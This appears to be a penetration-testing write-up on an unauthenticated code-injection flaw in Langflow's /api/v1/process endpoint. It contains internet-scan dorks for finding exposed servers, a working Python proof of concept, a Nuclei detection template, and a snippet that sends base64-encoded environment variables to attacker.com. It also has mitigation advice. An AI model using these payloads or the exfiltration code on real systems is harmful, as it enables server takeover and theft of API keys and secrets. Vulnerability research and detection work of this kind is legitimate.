CVE-2026-33017: Langflow Unauthenticated Remote Code Execution
CVE-2026-33017 identifies a critical Remote Code Execution (RCE) vulnerability in Langflow versions prior to 1.1.2. The flaw resides in the backend's handling of serialized component data within the /api/v1/process endpoint, allowing unauthenticated attackers to execute arbitrary Python code. Exploitation occurs when a malicious graph configuration is submitted, bypassing the existing validation logic intended to restrict the execution of internal system calls. This vulnerability is particularly dangerous because Langflow, an open-source UI for LangChain, is frequently deployed in cloud environments with direct access to sensitive API keys and internal databases.
Identifying Vulnerable Instances with Internet-Wide Scanning
Before developing a detection template, we must identify the footprint of the target application. Langflow instances are typically hosted on port 7860 by default and can be identified by specific HTTP response headers or the unique favicon hash. Using Zondex, we can identify exposed Langflow dashboards globally by searching for the Server: uvicorn header in conjunction with the title tag <title>Langflow</title>. This recon phase is essential for mapping the attack surface before attempting to validate the specific vulnerability.
Common dorks for identifying Langflow include:
http.title:"Langflow"http.favicon.hash:-1456382571http.html:"window.config.api_url"
Analyzing the Attack Vector
The vulnerability exists in the way Langflow processes the data parameter in a POST request to /api/v1/process/<flow_id>. While the flow_id usually refers to a pre-defined flow, the API incorrectly allows the inclusion of a tweaks dictionary that can override component logic. By injecting a CustomComponent with a modified build method containing malicious Python code, an attacker can achieve code execution within the context of the Langflow server process.
The following Python script demonstrates a manual PoC for triggering a simple DNS interaction to confirm the vulnerability. This approach avoids immediate destructive actions while providing a clear indicator of successful execution.
import requests
import json
target_url = "http://target-langflow.internal:7860/api/v1/process/any-uuid"
interact_domain = "YOUR_INTERACTSH_DOMAIN"
payload = {
"inputs": {},
"tweaks": {
"CustomComponent-XYZ": {
"code": f"""
import os
import socket
def build():
socket.gethostbyname('{interact_domain}')
return "Exploited"
""",
"template": "code"
}
}
}
try:
response = requests.post(target_url, json=payload, timeout=10)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")
except Exception as e:
print(f"Error: {e}")
Constructing the Nuclei Template
To automate the detection of CVE-2026-33017 across multiple targets, we utilize the Nuclei engine. The template must perform a POST request to the vulnerable endpoint and utilize an Out-of-Band (OOB) interaction platform like Interactsh to confirm the RCE. This ensures high accuracy and minimizes false positives that might occur if we only relied on HTTP status codes.
When running high-volume scans across diverse infrastructure, routing traffic through GProxy ensures that the testing origin remains obfuscated and avoids IP-based rate limiting that could interfere with the precision of the scan results. The template below targets the /api/v1/process/ path and injects a Python snippet designed to trigger a DNS lookup.
Nuclei Template Structure: langflow-rce.yaml
id: CVE-2026-33017
info:
name: Langflow RCE (CVE-2026-33017)
author: pentest-research
severity: critical
description: Detects an unauthenticated RCE in Langflow via CustomComponent code injection in the process endpoint.
tags: cve,cve2026,langflow,rce,python
http:
- raw:
- |
POST /api/v1/process/00000000-0000-0000-0000-000000000000 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"inputs": {},
"tweaks": {
"NucleiScanComponent": {
"code": "import socket\n\ndef build():\n socket.gethostbyname('{{interactsh-url}}')\n return 'vulnerable'",
"template": "code"
}
}
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 200
- 500
Advanced Exploitation and Data Exfiltration
Once the RCE is confirmed, the next logical step in a penetration test is assessing the impact. Langflow often stores sensitive configuration data in a local SQLite database or connects to remote vector stores like Pinecone, Milvus, or Weaviate. An attacker can leverage the same CustomComponent injection to exfiltrate environment variables containing API keys.
The following code block demonstrates how an attacker might exfiltrate the .env file contents to a remote listener. During an actual engagement, this data would be used to demonstrate the potential for lateral movement within the target's AI infrastructure.
import requests
import base64
# Exfiltrating environment variables via CustomComponent
code_injection = """
import os
import requests
def build():
env_data = str(dict(os.environ))
encoded = base64.b64encode(env_data.encode()).decode()
requests.get(f"http://attacker.com/log?d={encoded}")
return "Done"
"""
For organizations looking to automate this detection at scale, integrating these custom templates into Secably provides continuous monitoring and alerting for newly exposed vulnerabilities across the entire digital asset inventory. This is particularly useful for DevOps teams who may inadvertently deploy Langflow instances for testing without proper authentication middleware.
Running the Nuclei Scan
To execute the detection against a list of targets gathered from reconnaissance, use the following command structure. This uses the custom template we created and specifies the output format for documentation.
# Run nuclei against a list of Langflow instances
nuclei -l targets.txt -t langflow-rce.yaml -o results_cve_2026_33017.txt -vv
The -vv flag is useful during template debugging to see the raw request and response details, ensuring that the tweaks dictionary is correctly formatted and accepted by the server. If the server returns a 422 Unprocessable Entity, it likely indicates that the JSON schema has changed, requiring an update to the Nuclei template's body structure.
Mitigation and Remediation
If a Langflow instance is found to be vulnerable, immediate remediation is required. The most effective fix is upgrading to Langflow version 1.1.2 or later, which implements strict validation on the tweaks parameter and disables the dynamic execution of CustomComponent code from unauthenticated API calls.
Temporary mitigations include:
- Implementing a Web Application Firewall (WAF) to block POST requests to
/api/v1/process/that contain thecodeorCustomComponentstrings. - Enforcing mandatory authentication via an OIDC provider or basic auth at the reverse proxy level (Nginx/Traefik).
- Restricting the Langflow service's network access to only essential internal resources to prevent lateral movement.
Verifying the remediation involves re-running the Nuclei template. A patched instance should either reject the request with a 403 Forbidden or 401 Unauthorized, or fail to trigger the OOB DNS interaction despite a 200 OK response, indicating that the injected code was ignored or sanitized.